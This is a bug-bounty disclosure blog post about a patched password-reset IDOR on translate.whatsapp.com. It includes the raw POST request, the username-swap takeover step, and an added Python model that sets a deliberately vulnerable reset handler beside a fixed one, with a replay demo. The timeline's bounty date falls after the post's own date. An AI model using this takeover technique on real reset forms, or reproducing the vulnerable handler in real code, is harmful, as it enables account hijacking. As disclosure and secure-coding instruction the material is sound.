Tuesday 24 May 2016

How I could have hacked anyone's WhatsApp Translate account

In the name of Allah the beneficent the Merciful.


It was a Thursday night (the day before my semester exam) when I came to know that WhatsApp is now part of the Facebook bug bounty, and I started hunting on it.
Soon I discovered an account takeover flaw in the WhatsApp Translate website, translate.whatsapp.com.

WhatsApp Translate has more than 10 million users all over the world.

The bug was an Insecure Direct Object Reference (IDOR) in the password reset functionality.

Here is the POST request:

POST /reset HTTP/1.1
Host: translate.whatsapp.com
Connection: keep-alive
Content-Length: 164
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: https://translate.whatsapp.com/
Upgrade-Insecure-Requests: 1
User-Agent:
Referer: https://translate.whatsapp.com/reset?id=0eebabde1b2144a4942b54ad22393982
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8
Cookie: __utmt=1;

csrfmiddlewaretoken=&password=&password_again=&username=&hash_id=0eebabde1b2144a4942b54ad22393982

The "username" parameter was vulnerable. The server checked the reset token (hash_id) from the link it had sent, but the account whose password was changed came from the username field in the POST body, which the client controls. Because the token was not bound to the account it had been issued for, anyone holding a valid hash_id for their own account could change the password of any other WhatsApp Translate account.

This is an Insecure Direct Object Reference (IDOR) in the username parameter: just replace the username with the victim's username and it's game over!
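To show the difference between what the post describes and a correct reset flow, here is a small Python model of the handler. It is an added example, not WhatsApp's code (which is not public); the class and method names (ResetService, reset_vulnerable, reset_fixed), the in-memory user and token tables and the constructed form dictionaries are assumptions, while the form field names (hash_id, username, password, password_again) come from the request above. reset_vulnerable reproduces the flaw: hash_id is only checked for existence, and the password is written to whatever username the client sends. reset_fixed binds the token to one account when it is minted, stores only a hash of the token, makes it single-use with an expiry, and rejects a username that does not match.

```python
import hashlib
import hmac
import secrets
import time


class ResetService:
    """In-memory stand-in for the site's user and reset-token tables (assumption)."""

    def __init__(self, usernames, ttl_seconds=3600):
        self.users = {u: None for u in usernames}   # username -> (salt, pbkdf2 digest)
        self.tokens = {}                             # sha256(hash_id) -> token record
        self.ttl = ttl_seconds

    @staticmethod
    def _hash_password(password):
        salt = secrets.token_bytes(16)
        digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)
        return salt, digest

    def verify_password(self, username, password):
        record = self.users.get(username)
        if record is None:
            return False
        salt, digest = record
        candidate = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)
        return hmac.compare_digest(candidate, digest)

    def issue_reset_token(self, username):
        """Mint the hash_id that goes into the reset link, bound to ONE account."""
        if username not in self.users:
            raise KeyError(username)
        hash_id = secrets.token_hex(16)  # 32 hex chars, like the hash_id in the request
        key = hashlib.sha256(hash_id.encode()).hexdigest()  # store a hash, not the token
        self.tokens[key] = {"username": username,
                            "expires": time.time() + self.ttl,
                            "used": False}
        return hash_id

    def _lookup(self, hash_id):
        return self.tokens.get(hashlib.sha256(hash_id.encode()).hexdigest())

    def reset_vulnerable(self, form):
        """The flaw in the post: hash_id only proves that SOME reset was requested;
        the account whose password changes is taken from the client-supplied form."""
        token = self._lookup(form.get("hash_id", ""))
        if token is None:
            return "invalid token"
        if not form["password"] or form["password"] != form["password_again"]:
            return "passwords do not match"
        target = form["username"]  # attacker-controlled
        if target not in self.users:
            return "no such user"
        self.users[target] = self._hash_password(form["password"])
        return "ok"

    def reset_fixed(self, form):
        """Hardened: the account is the one the token was issued for, the token is
        single-use and expires, and a client-supplied username must agree with it."""
        token = self._lookup(form.get("hash_id", ""))
        if token is None or token["used"] or token["expires"] < time.time():
            return "invalid token"
        if not form["password"] or form["password"] != form["password_again"]:
            return "passwords do not match"
        username = token["username"]
        if form.get("username") not in ("", None, username):
            return "invalid token"  # do not reveal whether the username exists
        self.users[username] = self._hash_password(form["password"])
        token["used"] = True
        return "ok"


def demo():
    """Replay the attack from the post against both handlers (constructed data)."""
    svc = ResetService(["victim", "attacker"])
    # The attacker requests a reset for their OWN account and gets a valid hash_id...
    form = {"csrfmiddlewaretoken": "", "hash_id": svc.issue_reset_token("attacker"),
            "username": "victim", "password": "pwned", "password_again": "pwned"}
    # ...then submits it with the victim's username.
    vuln_result = svc.reset_vulnerable(form)
    victim_hijacked = svc.verify_password("victim", "pwned")

    svc2 = ResetService(["victim", "attacker"])
    form2 = dict(form, hash_id=svc2.issue_reset_token("attacker"))
    fixed_result = svc2.reset_fixed(form2)
    return vuln_result, victim_hijacked, fixed_result, svc2.verify_password("victim", "pwned")


if __name__ == "__main__":
    print(demo())  # ('ok', True, 'invalid token', False)
```

The check a tester would run against a real reset form is the same as demo(): request a reset for an account you own, then submit the token with someone else's identifier and see whether the server honours the identifier or the token. A reset endpoint should never need a username at all once the token identifies the account.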


Here is the video PoC (embedded video).

Facebook fixed the issue in production within 2 hours of acknowledgment and rewarded $1000 USD for my work.

It is no longer possible to exploit this IDOR, which was affecting more than 10 million users.



Timeline:

May 13, 2016 at 1:07 AM  : Bug reported

May 18, 2016 at 12:11 AM : Escalated by Facebook

May 18, 2016 at 2:27 AM  : Bug fixed; asked for confirmation

May 25, 2016 at 5:18 AM  : Bounty rewarded



I would like to thank Facebook Security for the quick fix of the issue on the production server, and as usual I am happy to help keep the community from getting hacked.

Thanks for Reading
Jai Hind  :) 
Contact info:
facebook : facebook.com/haji.mohd871
twitter : @mohdhaji24
linkedin : linkedin.com/in/mohd-haji-490960a0




